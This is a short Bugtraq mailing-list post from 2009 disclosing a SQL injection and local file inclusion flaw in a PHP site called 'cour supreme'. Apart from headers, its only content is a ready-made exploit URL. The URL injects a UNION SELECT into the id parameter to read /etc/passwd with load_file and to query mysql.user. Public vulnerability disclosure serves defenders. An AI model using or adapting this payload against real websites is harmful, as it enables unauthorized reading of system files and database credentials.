Bugtraq mailing list archives

cour supreme 'index.php' SQL Injection & Local File Include Vulnerability


From: CrAzY_CrAcKeR () hotmail com
Date: Tue, 22 Sep 2009 22:13:36 -0600

=================================================

Discovered By: CrAzY CrAcKeR

Email: CrAzY_CrAcKeR(at)hotmail(dot)com

================================================

example:-

http://www.example.in/index.php?p=affichedecision&id=-669 union select 
1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user

================================================


Current thread: